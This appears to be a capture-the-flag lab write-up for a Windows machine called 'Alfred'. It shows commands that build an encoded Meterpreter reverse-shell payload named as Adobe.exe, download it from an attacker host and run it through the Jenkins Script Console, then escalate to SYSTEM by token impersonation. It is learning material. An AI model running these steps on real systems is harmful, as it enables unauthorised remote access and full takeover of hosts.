Skip to main content

Alfred

MSFVENOM

  • Generating the PAYLOAD with MSFvenom
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=PORT -f exe -o Adobe.exe

Jenkins Console

  • Uploading the PAYLOAD using the Jenkins Script Console
"powershell (New-Object System.Net.WebClient).Downloadfile('http://ATTACKER_IP:PORT/Adobe.exe','Adobe.exe')".execute().text

  • After Uploading the PAYLOAD we can Execute it from the Script Console
"powershell -c Start-Process Adobe.exe".execute().text

Privilege Escalation

  • We can catch the Reverse Shell from Jenkins Script Console with Metasploit
  • Using: exploit/multi/handler
  • PAYLOAD: windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Sending stage (175686 bytes) to 10.10.47.178
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 10.10.47.178:49211) at 2022-10-10 04:31:19 +0200
  • We are Logged as: alfred\bruce 
meterpreter > getuid 
Server username: alfred\bruce
meterpreter > sysinfo 
Computer        : ALFRED
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

Privileges

  • User Privileges: [SeDebugPrivilege] - [SeImpersonatePrivilege]
  • The Privileges of an Account (Given to the Account when Created or Inherited from a Group) allow a User to carry out Particular Actions. 
C:\Program Files (x86)\Jenkins> whoami /all

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
[..]
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
[..]


Access Tokens

  • There are two types of Access Tokens:
  • [Primary Access Tokens] Those Associated with a User Account that are Generated on Log-on.
  • [Impersonation Tokens] These allow a particular Process (Or Thread in a Process) to gain Access to Resources using the Token of another (User - Client) Process.

  • Load: incognito
  • Command: list_tokens -g
  • The BUILTIN\Administrators Token is Available.
meterpreter > load incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[..]

Exploitation

  • Command: impersonate_token "BUILTIN\Administrators"
  • We have System Rights: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token "BUILTIN\Administrators"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM